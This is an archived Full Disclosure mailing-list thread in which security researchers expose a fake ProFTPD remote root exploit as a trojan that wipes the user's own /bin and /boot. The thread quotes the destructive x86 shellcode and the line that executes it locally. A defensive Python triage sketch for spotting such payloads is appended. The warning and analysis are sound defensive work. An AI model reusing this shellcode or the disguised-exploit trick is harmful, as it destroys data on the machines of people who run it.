Full Disclosure mailing list archives
Re: ProFTPD-1.2.9rc2 remote root exploit
From: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh () nsrg-security com>
Date: Fri, 24 Oct 2003 17:58:22 +0200
Fucking jokes, I saw a strange shellcode so I didn't use it, hahahahaha, and I saw too the local executed shellcode so again I didn't compile nor use it.
Is it normal here? People publish here these type of jokes usually?
Anybody remembers the sshd fake exploit that binds a shell in port 77~~ (I don't remember) but it was really funny!
My God!

Best regards,
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->\x74\x72\x75\x6c\x75\x78
0x02->The truth is out there,
0x03-> outside your mind .
__________________________________
PGP: Keyfingerprint
4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B
ID: 0x91805F5B
**********************************
\x6e\x73\x72\x67
\x73\x65\x63\x75\x72\x69\x74\x79
\x72\x65\x73\x65\x61\x72\x63\x68
http://www.nsrg-security.com
______________________

----- Original Message -----
From: "Andreas Gietl" <a.gietl () e-admin de>
To: <zim () iq pl>
Cc: "Jean-Kevin Grosnakeur" <fufeur () hotmail com>; <full-disclosure () lists netsys com>
Sent: Friday, October 24, 2003 4:24 PM
Subject: Re: [Full-disclosure] ProFTPD-1.2.9rc2 remote root exploit

On Friday 24 October 2003 16:20, Robert Jaroszuk wrote:

yeah, it deletes /bin/* boot/* and few other files.

On Fri, 24 Oct 2003, Andreas Gietl wrote:

; On Friday 24 October 2003 14:22, Jean-Kevin Grosnakeur wrote:
;
; this seems to delete sth on the local harddisk. anybody else seeing this
; effect?

Yea, something like that.

/* x86 bind shellcode */
char sc[]=
"\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
"\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
"\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
"\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
"\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
"\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
"\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
"\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";

[ cut ]

/* connect to the bindshell */
printf("Trying to connect, please wait...\n");
void(*sleep)()=(void*)sc;sleep(5);

This exploit tries to run shellcode on local machine.
Probably smth evil in this shellcode:

--
e-admin internet gmbh
Andreas Gietl                tel +49 941 3810884
Ludwig-Thoma-Strasse 35      fax +49 (0)1805/39160 - 29104
93051 Regensburg             mobile +49 171 6070008
PGP/GPG-Key at http://www.e-admin.de/gpg.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
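
A static triage sketch for the pattern discussed in this thread, added here as an example and not part of any poster's message: it reads a C "exploit" without compiling it, flags a byte array that is cast to a pointer and assigned (the local-execution line quoted above), and recovers strings built with x86 `push imm32`. The sample source and its bytes are constructed and inert, the function names are hypothetical, and both checks are heuristics.

```python
import re

# Constructed sample in the style of the quoted code; the bytes are inert filler.
SAMPLE_SOURCE = r'''
/* x86 bind shellcode */
char sc[]=
 "\x31\xc0\x50\x68\x68\x69\x58\x58\x68\x63\x68\x6f\x20\x68\x2d\x63\x58\x65"
 "\x68\x2f\x73\x68\x58\x68\x2f\x62\x69\x6e\x31\xc0";
printf("Trying to connect, please wait...\n");
void(*sleep)()=(void*)sc;sleep(5);
'''

ARRAY_RE = re.compile(r'char\s+(\w+)\s*\[\s*\]\s*=\s*((?:"[^"]*"\s*)+);')

def shellcode_arrays(src):
    """Return {array_name: bytes} for every char array built from \\xNN escapes."""
    found = {}
    for name, literal in ARRAY_RE.findall(src):
        hexes = re.findall(r'\\x([0-9a-fA-F]{2})', literal)
        if hexes:
            found[name] = bytes(int(h, 16) for h in hexes)
    return found

def stack_strings(code):
    """Heuristic: join printable operands of consecutive `push imm32` (0x68)."""
    out, run, i = [], [], 0
    while i < len(code):
        operand = code[i + 1:i + 5]
        if (code[i] == 0x68 and len(operand) == 4
                and all(0x20 <= b < 0x7f for b in operand)):
            run.append(operand.decode("ascii"))
            i += 5
            continue
        if run:
            out.append("".join(reversed(run)))  # last push sits lowest in memory
            run = []
        i += 1
    if run:
        out.append("".join(reversed(run)))
    return out

def triage(src):
    report = []
    for name, code in shellcode_arrays(src).items():
        # Array cast to a pointer type and assigned: it may be called locally.
        cast = re.search(r'=\s*\([^)]*\*\s*\)\s*' + re.escape(name) + r'\b', src)
        report.append({"array": name, "runs_locally": bool(cast),
                       "strings": stack_strings(code)})
    return report
```

Calling `triage()` on the text of a downloaded proof-of-concept before building it shows which arrays the program would execute on the local host and what command-like strings they carry.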